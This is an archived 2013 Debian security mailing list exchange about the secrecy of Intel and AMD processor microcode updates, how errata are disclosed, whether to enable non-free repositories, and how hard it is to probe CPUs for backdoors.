On Mon, Sep 9, 2013 at 12:55 AM, Henrique de Moraes Holschuh
h...@debian.org wrote:
 On Sun, 08 Sep 2013, Joel Rees wrote:
 I was hoping that AMD was not going to have the license and
 non-visibility issue that plagues the Intel processor microcode
 updates. But I find this original announcement from when Henrique made
 the updater tool available:

 http://lists.debian.org/debian-devel/2012/11/msg00109.html

 AMD is better than Intel at telling the general public what a microcode
 update fixes.  AMD does publish to the general public the errata each
 microcode update fixes.  What each erratum means is also published in the
 AMD processor Revision Guides, which are also public.

 Not that it will help you much.  Really.  Most of the errata worth fixing
 through a microcode update causes either unpredictable system behaviour,
 data corruption, or system hangs/reboots.  Only a few fixes are for minor
 issues such as power management, performance, or optional features.  And
 most of the time, it is very very difficult to access how difficult it is to
 hit a given erratum.  So it is a update or else deal, because it always
 fixes something horrible (even when the chances of you hitting the issue are
 very remote -- but you won't be able to know that, you'll have to update
 just in case anyway)

X/ or else ..., when there are secrets being kept always bugs me.

 AFAIK, Intel does publish the same kind of information but it is not
 available to the general public.

I don't really call that publishing. Publishing privately is one of
the conceits introduced at Berne that undermine the principle of
copyrights in free countries.

 Intel does publish to the general public
 the list of errata in their processor specification updates documentation,
 it just almost never writes down in public documentation what errata a
 microcode update fixes.

 And you could also have internal/non-public errata and fixes, nothing forces
 Intel, AMD, or any other vendor to disclose (even to their hardware
 partners) the full list of errata and behaviour changes (fixes, etc).

 Note that even the internal errata/fix information is bound to be really
 uninteresting anyway.  Backdoors would not be documented anywhere, heck, it
 is very likely that only the one or two engineers that had to implement them
 even know about it.

Still, secrecy about the microcode and about the updating machinery
makes it that much harder to probe for back doors.

Ken Thompson didn't mention it in his essay, but it is possible to
probe library code for stuff that isn't in the source code. And it is
possible to probe a CPU for backdoors, if you have enough
documentation about their correct behavior.

Modern CPUs (particularly x86 and AMD64) are like MSWindows -- too
complex, not accessible to review, no guard rails.

 --
   One disk to rule them all, One disk to find them. One disk to bring
   them all and in the darkness grind them. In the Land of Redmond
   where the shadows lie. -- The Silicon Valley Tarot
   Henrique Holschuh

--
Joel Rees


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/caar43ipy2opcbg-8ntnvwu5zeyyam4zonya+pkbxdwt514k...@mail.gmail.com

Microcode update conundrum (was Re: ANNOUNCEMENT: Intel processor microcode security update)

[Joel Rees]

(I kind of hope this starts a flame war large enough to embarrass the
corporate culprits into behaving themselves about this. Apologies in
advance when I step on toes.)

I was hoping that AMD was not going to have the license and
non-visibility issue that plagues the Intel processor microcode
updates. But I find this original announcement from when Henrique made
the updater tool available:

http://lists.debian.org/debian-devel/2012/11/msg00109.html

And that shoots that dream. So,

(1) This requires enabling two repositories that I have been avoiding
enabling, contrib and non-free. That means I have to watch the
repository more carefully when using

apt-cache search

or synaptic to look for new tools, right? Or can we just enable those
two repositories long enough to load Henrique's tool and the microcode
updates, then disable them again?

(2) Are there any CPU manufacturers who are not plagued by this
ultimate refusal to let computer owners actually own their computers?
How do the ARM manufacturers do?

(2a) Is debian running on any of the open core CPUs? (I don't remember
any evidence of such, but maybe I just missed it?)


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/caar43in8fkrxshhzjdehgfkep2htycwjoxexewrfayrrvzm...@mail.gmail.com